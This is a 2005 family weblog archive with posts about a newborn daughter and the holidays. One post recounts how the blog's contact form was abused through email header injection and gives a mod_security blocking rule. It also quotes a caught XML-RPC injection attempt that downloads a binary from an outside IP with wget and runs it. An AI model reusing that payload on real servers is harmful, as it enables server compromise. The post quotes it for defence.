You are currently browsing the motyka.org weblog archives for December, 2005.

Amelia’s First Christmas

Posted In: Amelia, Everyday life — December 31, 2005 @ 12:04 pm — Peter

The holidays went off without a hitch and we enjoyed a nice visit from my mother and father. Despite it being a rather hectic week, everyone had a great time

Pictures from xmas…

We have another 4 day weekend ahead of us and some nice weather to get outside for a walk. Shortly after I wrap up this post, we’ll be bundling Amelia, saddling up Iris, and heading for the park. While the weather we’re having is definitely abnormal, it sure is nice to get Amelia and Iris outside for some fresh air.

Comments Off

Happy Holiday

Posted In: Everyday life — December 25, 2005 @ 10:20 pm — Peter

Merry <insert respective holiday here>! Today was an unseasonably warm beautiful day and the whole family, sans felines, went out for a walk. We visited both parks in our neighborhood and Amelia snoozed the entire time in her comfy sling. It seems we’ll be having this nice weather for the coming week. My parents will be happy to have some reprieve from the icky cold weather the Chicagoland area is having. Funny, I can’t possibly count the number of warnings that we received about the arctic temperatures we’d suffer in Denver. All I have to say is, I wore a t-shirt outside today!

Amelia June was subjected to another photo shoot yesterday to model the adorable sweater and hat set that Chris and Amy sent us. She tolerated a few pictures, but then proceeded to wail loudly hoping we’d stop. It’s her fault! If she weren’t so damn cute, we wouldn’t be forced to take so many pictures!

New pictures…

Comments Off

Canned Spam

Posted In: Technology — December 23, 2005 @ 9:17 pm — Peter

We’ve been bit by a spammer using our contact page maliciously to send roughly 1000 email messages trying to sell software.

I suspected something was up when I received email messages containing MIME headers in the message body, but I brushed it off assuming I was protected because the “TO:” value is hard coded in the PHP script.

Shortly after, nicely formatted messages started rolling in that were hawking cheap software and were seemingly originating from our server. After inspecting the headers of one of the messages, I realized the contact page was being exploited and quickly locked it down using chmod.

After a bit of research, I see how the form was being exploited. The PHP mail function simply inserts text willy-nilly that is passed to it into the respective area of an email message. The spammer was packing the message body with MIME content that allowed for the specification of “BCC:” values. Oops, I really should have validated this input before passing it along to PHP mail(). Here is a great article the explaining the risks involved with using PHP mail() and other form mail processing technologies:

http://securephp.damonkohler.com/index.php/Email_Injection

I was tempted to wrap the form fields of the contact page with some regex to rid us of the annoying spammer, but that didn’t seem like a good solution. The article above mentioned a module for Apache web server called mod_security that acts as an application firewall preventing malformed data from reaching scripts and applications. After a bit more reading, I determined this module was right up my alley. I quickly installed it and devised the following rule to protect the contact page from MIME header injection:

SecFilterSelective "POST_PAYLOAD" ".*(content-disposition|to|cc|bcc|from|content-type|mime-version|content-transfer-encoding|subject)[[:space:]]*\:.*"

After doing some more research, I found a wonderful community of support sharing rules to thwart the hacking efforts of spammers and script kiddies. I’ve loaded a few rule bundles from http://gotroot.com/ and am pleased with the results. For example, this nasty hack attempt was caught shortly after loading the extensive rule sets:

< ?xml version="1.0"?>test.method ‘,”));echo ‘_begin_’;echo `cd /tmp;wget 209.136.48.69/mirela;chmod +x mirela;./mirela `;echo ‘_end_’;exit;/*

Of course this added security comes with quite a price tag in terms of CPU resources. Actually, the full package of rules from http://gotroot.com/ caused our server to seize up due to lack of free memory… It makes sense since each request must be aggressively inspected and compared against a massive rule base to determine if it is legitimate traffic.

Dec 23 18:47:16 eudora kernel: Free swap = 0kB
Dec 23 18:47:16 eudora kernel: Total swap = 522072kB
Dec 23 18:47:18 eudora kernel: Out of Memory: Killed process 11935 (httpd).

These log entries are from a postmortem analysis after our server became so overloaded that it would not respond to any sort of network connections. Perhaps I’ll resize the swap file, but I’d prefer to get a server with more RAM and CPU resources… Anyone want to donate some hardware to our lovely website? I’m hoping this server is still available for sale…

For the time being, I’ve trimmed the mod_security ruleset down to what I see being the most important lines of defense. Already our site seems to be more responsive and hopefully will remain safe against spammers and script kiddies.

Comments (2)

Baby daze

Posted In: Everyday life — December 18, 2005 @ 9:20 pm — Peter

Ms. Mia pants is doing great! She had her first well-baby visit on Friday and all of her vital statistics are on track. She has already surpassed her birth weight by a few ounces and tipped the scale at 8 pounds 6 ounces. There has been no shortage of dirty diapers and her appetite is great.

Tomorrow is my last day of baby vacation, Tuesday starts a 4 day stint of working from home, then back to the office on Tuesday, December 27th. The 27th is also the day that my folks will be paying us a short visit to get to know Amelia. It will be a hectic week, but I’m sure we’ll manage.

Left on the agenda for tonight is a trip up to Walgreens to pick up some digital photo prints. Walgreens’ photo printing service is great, if you haven’t tried it yet. From what I can tell, the service is provided by Snapfish based on some data from the email headers attached to the email messages from Walgreens.

Received: from mta.snapfish.com (20.pod2.snapfish.com [64.147.179.20])

Without further ado, new pictures of Amelia!

Comments Off

Love…

Posted In: Everyday life — December 15, 2005 @ 2:11 pm — Stephanie

Saying that my life has changed, or that my heart has stretched and grown to enormous proportions to accomodate the great love I feel, just doesn’t come close to capturing my feelings. The feeling is intense, and so overwhelming, that sometimes I find myself in tears just looking at her. My daughter and my husband are my life. I could cheerfully kill anyone who dared to harm them. They are precious to me, and I have no idea how I ever existed without the two of them.

She has her daddy’s ears and chin, mama’s nose and cheeks, and beautifully-shaped eyes all her own. Amelia prefers being swaddled, loves chest to chest contact, and makes “ahhh ahhh” noises when she’s hungry. She sleeps just fine in her daddy’s sling, even while Iris incessantly barks at the mail lady. Mia hates being bathed, LOUDLY lets you know when she has a dirty diaper, and seems unconcerned about the constant parade of cats sneaking peeks into her co-sleeper. She and I have staring contests, which go on until she falls asleep or my attention is dragged away by something else.

Peter and I are trying to soak it all in, to absorb this newborn sweetness while we can. She’s going to grow and change so fast. While I am incredibly excited about watching her grow up into an amazing woman, there is a deep well of sadness in knowing she’ll never be my tiny baby girl again.

I will post her birth story at some point in the future. Right now, meeting Amelia’s needs and bonding with her is, of course, my highest priority. Now I have to wake up a little sleeping duckie (daddy dressed her in yellow duckies today) to fill her tummy up with mama milk. She’s on her daddy’s chest behind me–such a gorgeous sight.

I am the luckiest woman alive…

Comments Off

« Previous Entries